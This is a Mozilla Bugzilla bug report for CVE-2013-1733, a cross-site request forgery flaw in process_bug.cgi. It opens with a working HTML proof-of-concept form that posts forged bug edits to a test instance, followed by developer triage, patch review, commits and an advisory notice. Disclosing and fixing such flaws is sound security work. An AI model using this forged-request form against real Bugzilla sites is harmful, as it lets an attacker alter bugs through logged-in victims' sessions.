911593 - (CVE-2013-1733) [SECURITY] CSRF in process_bug.cgi

Status: RESOLVED FIXED

(Bugzilla :: Creating/Changing Bugs, defect)

Description

[Mateusz Goik]

PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST">
      <input type="hidden" name="delta&#95;ts" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="longdesclength" value="1" />
      <input type="hidden" name="id" value="21951" />
      <input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="alias" value="aaaaaaaaa" />
      <input type="hidden" name="short&#95;desc" value="TEST2" />
      <input type="hidden" name="product" value="FoodReplicator" />
      <input type="hidden" name="classification" value="Unclassified" />
      <input type="hidden" name="component" value="renamed&#32;component" />
      <input type="hidden" name="rep&#95;platform" value="PC" />
      <input type="hidden" name="op&#95;sys" value="Linux" />
      <input type="hidden" name="priority" value="P2" />
      <input type="hidden" name="bug&#95;severity" value="normal" />
      <input type="hidden" name="target&#95;milestone" value="&#45;&#45;&#45;" />
      <input type="hidden" name="assigned&#95;to" value="mybutt&#64;inyourface&#46;com" />
      <input type="hidden" name="qa&#95;contact" value="" />
      <input type="hidden" name="bug&#95;file&#95;loc" value="" />
      <input type="hidden" name="status&#95;whiteboard" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="tag" value="" />
      <input type="hidden" name="dependson" value="" />
      <input type="hidden" name="blocked" value="" />
      <input type="hidden" name="newcc" value="" />
      <input type="hidden" name="defined&#95;bug&#95;ignored" value="1" />
      <input type="hidden" name="see&#95;also" value="" />
      <input type="hidden" name="cf&#95;large&#95;text" value="" />
      <input type="hidden" name="cf&#95;free&#95;text" value="" />
      <input type="hidden" name="defined&#95;cf&#95;mulitple&#95;select" value="" />
      <input type="hidden" name="cf&#95;drop&#95;down" value="&#45;&#45;&#45;" />
      <input type="hidden" name="cf&#95;date" value="" />
      <input type="hidden" name="cf&#95;bug&#95;id" value="" />
      <input type="hidden" name="flag&#95;type&#45;8" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;8" value="" />
      <input type="hidden" name="flag&#95;type&#45;9" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;9" value="" />
      <input type="hidden" name="flag&#95;type&#45;11" value="X" />
      <input type="hidden" name="flag&#95;type&#45;5" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;5" value="" />
      <input type="hidden" name="flag&#95;type&#45;10" value="X" />
      <input type="hidden" name="flag&#95;type&#45;6" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;6" value="" />
      <input type="hidden" name="flag&#95;type&#45;12" value="X" />
      <input type="hidden" name="estimated&#95;time" value="0&#46;0" />
      <input type="hidden" name="work&#95;time" value="0" />
      <input type="hidden" name="remaining&#95;time" value="0&#46;0" />
      <input type="hidden" name="deadline" value="" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="bug&#95;status" value="CONFIRMED" />
      <input type="hidden" name="resolution" value="FIXED" />
      <input type="hidden" name="dup&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Comment 1

[Frédéric Buclin]

Confirmed! This is a regression due to bug 69447 which generates a new valid token without first making sure that the midair collision page will be displayed. This bug only affects 4.4 and newer. 4.3.3 and older are not affected.

Comment 2

[Frédéric Buclin]

I'm on it. Easy to fix.

Comment 3

[Frédéric Buclin]

Attachment: patch, v1

The new token must only be generated when we are going to display the midair collision page. Also, I had to validate delta_ts, else it was possible to crash PostgreSQL if you passed an invalid one.

Comment 4

[Daniel Veditz [:dveditz]]

Assigning CVE-2013-1733 to this vulnerability.

Comment 5

[David Lawrence [:dkl]]

Comment on attachment 798337 [details] [diff] [review]
patch, v1

Review of attachment 798337 [details] [diff] [review]:
-----------------------------------------------------------------

Looks fine and fixes the issue for me. r=dkl

::: process_bug.cgi
@@ +114,5 @@
> +my $delta_ts = $cgi->param('delta_ts');
> +
> +if ($delta_ts) {
> +    my $delta_ts_z = datetime_from($delta_ts)
> +      or ThrowCodeError('invalid_timestamp', { timestamp => $delta_ts });

nit: 4 space indentation

@@ +124,3 @@
>  
> +        my $start_at = $cgi->param('longdesclength')
> +          or ThrowCodeError('undefined_field', { field => 'longdesclength' });

same nit

Comment 6

[Frédéric Buclin]

(In reply to David Lawrence [:dkl] from comment #5)
> nit: 4 space indentation

Not when splitting long lines. ;)

Comment 7

[Simon Green]

Will be patched on bugzilla.redhat.com at 4am UTC (just over two hours from now)

Comment 8

[Daniel Veditz [:dveditz]]

Dave: does this affect BMO? iirc we're on 4.2 plus backported goodies and may or may not suffer from this.

Comment 9

[Frédéric Buclin]

(In reply to Daniel Veditz [:dveditz] from comment #8)
> Dave: does this affect BMO?

Yes, see bug 912661.

Comment 10

[Frédéric Buclin]

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified process_bug.cgi
Committed revision 8777.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified process_bug.cgi
Committed revision 8623.

Comment 11

[Frédéric Buclin]

Security advisory sent.